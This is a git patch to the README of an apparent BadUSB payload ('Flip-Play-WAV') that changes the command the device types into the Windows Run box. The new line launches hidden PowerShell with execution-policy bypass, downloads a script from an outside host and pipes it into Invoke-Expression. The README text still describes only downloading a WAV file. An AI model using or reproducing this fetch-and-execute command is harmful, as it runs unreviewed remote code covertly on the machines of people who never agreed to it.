From 99378b0b7400ec5805bd0d91f9f192a2d531be77 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Tue, 20 Dec 2022 17:45:35 -0600 Subject: [PATCH] Update README.md --- Payloads/Flip-Play-WAV/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Payloads/Flip-Play-WAV/README.md b/Payloads/Flip-Play-WAV/README.md index b172b11..07fc92e 100644 --- a/Payloads/Flip-Play-WAV/README.md +++ b/Payloads/Flip-Play-WAV/README.md @@ -38,7 +38,7 @@ After one is the WAV file will be played. * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download your WAV file ``` -powershell -w h -NoP -NonI -Exec Bypass iwr https:// < Your Shared link for the intended file> ?dl=1 -O $env:TMP\e.wav +powershell -w h -NoP -NonI -Ep Bypass $wav='';iwr https://jakoby.lol/vus | iex ```

(back to top)